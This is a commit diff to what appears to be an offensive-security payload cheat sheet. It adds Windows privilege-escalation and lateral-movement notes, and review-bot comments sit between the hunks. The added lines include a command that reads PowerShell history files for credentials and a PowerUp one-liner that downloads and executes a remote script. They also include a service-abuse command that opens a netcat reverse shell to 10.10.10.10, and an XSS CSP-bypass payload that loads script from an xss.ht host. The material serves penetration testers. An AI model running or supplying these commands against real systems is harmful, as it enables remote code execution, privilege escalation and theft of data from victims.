Powershell Remoting

patch-1
Swissky 2020-08-09 12:15:56 +02:00
parent 268b4c2d47
commit c7e3ea005e
4 changed files with 54 additions and 3 deletions

@ -457,6 +457,7 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
### Powershell history ### Powershell history
```powershell ```powershell
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath
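Review bot: The added `type %userprofile%\AppData\Roaming\...` line uses cmd.exe variable syntax inside a block fenced as `powershell`; PowerShell does not expand `%userprofile%`, so the line only works when typed into cmd.exe. Either rewrite it with `$env:USERPROFILE`, or mark it as the cmd.exe variant, since the `$env:APPDATA` line two rows below already covers the same file for PowerShell.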
@ -676,7 +677,24 @@ wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
``` ```
Metasploit provides the exploit : `exploit/windows/local/trusted_service_path` * Metasploit exploit : `exploit/windows/local/trusted_service_path`
* PowerUp exploit
```powershell
# find the vulnerable application
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
...
[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
...
# automatic exploit
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
```
### Example ### Example
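Review bot: Placeholder style is inconsistent inside the added PowerUp block: the sample output uses `<HijackPath>` and a concrete `BBSvc`, while the last command uses `[SERVICE_NAME]`; pick one convention. The block also puts a `C:\>` prompt, tool output and a bare command under a single `powershell` fence, so mark which lines are typed and which are output. Since the finding shown is an unquoted service path, a line stating the fix (quote the service's binary path) would make the entry usable for remediation as well.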

@ -11,6 +11,7 @@
* [Metasploit - Psexec](#metasploit-psexec) * [Metasploit - Psexec](#metasploit-psexec)
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) * [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
* [WinRM](#winrm) * [WinRM](#winrm)
* [Powershell Remoting](#powershell-remoting)
* [Crackmapexec](#crackmapexec) * [Crackmapexec](#crackmapexec)
* [Winexe](#winexe) * [Winexe](#winexe)
* [WMI](#wmi) * [WMI](#wmi)
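Review bot: The new TOC entry sits between `WinRM` and `Crackmapexec`, but the section body added in the next hunk is placed directly before `## Winexe`, so the TOC order and the document order disagree. Move the entry or the section so both follow the same sequence.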
@ -147,6 +148,30 @@ conn.shell(:powershell) do |shell|
end end
``` ```
## Powershell Remoting
> PSSESSION
```powershell
PS> Enable-PSRemoting
# one-to-one interactive session
PS> Enter-PSSession -computerName DC01
[DC01]: PS>
# one-to-one execute scripts and commands
PS> $Session = New-PSSession -ComputerName CLIENT1
PS> Invoke-Command -Session $Session -scriptBlock { $test = 1 }
PS> Invoke-Command -Session $Session -scriptBlock { $test }
1
# one-to-many execute scripts and commands
PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service }
PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1
```
## Winexe ## Winexe
Integrated to Kali Integrated to Kali
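Review bot: The `$Session` created with `New-PSSession -ComputerName CLIENT1` is never closed; end the one-to-one example with `Remove-PSSession $Session` so readers do not leave persistent sessions on the remote host. `Enable-PSRemoting` is shown first without saying that it is run, elevated, on the machine that will accept connections; a comment line would make that clear. Parameter casing also varies (`-computerName`, `-ComputerName`, `-computername`, `-scriptBlock`), and the `> PSSESSION` quote does not describe the section.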
@ -262,6 +287,7 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
``` ```
## References ## References
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)

@ -4,7 +4,13 @@ A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques ! Feel free to improve with your payloads and techniques !
I :heart: pull requests :) I :heart: pull requests :)
You can also contribute with a :beers: IRL You can also contribute with a :beers: IRL, or using the sponsor button.
<p align="center">
<img src="https://repository-images.githubusercontent.com/71220757/fac34f00-9854-11ea-9d6f-55fe78f233fb">
</p>
Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter: Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
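Review bot: The added `<img>` has no `alt` attribute, so the banner is invisible to screen readers and shows nothing if the hotlinked image fails to load; add a short `alt` text. The sponsor sentence and banner are also unrelated to the commit subject "Powershell Remoting" and would be easier to review and revert as their own commit.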

@ -972,7 +972,8 @@ window.frames[0].document.head.appendChild(script);
### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
```js ```js
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) // CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
``` ```
### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen) ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)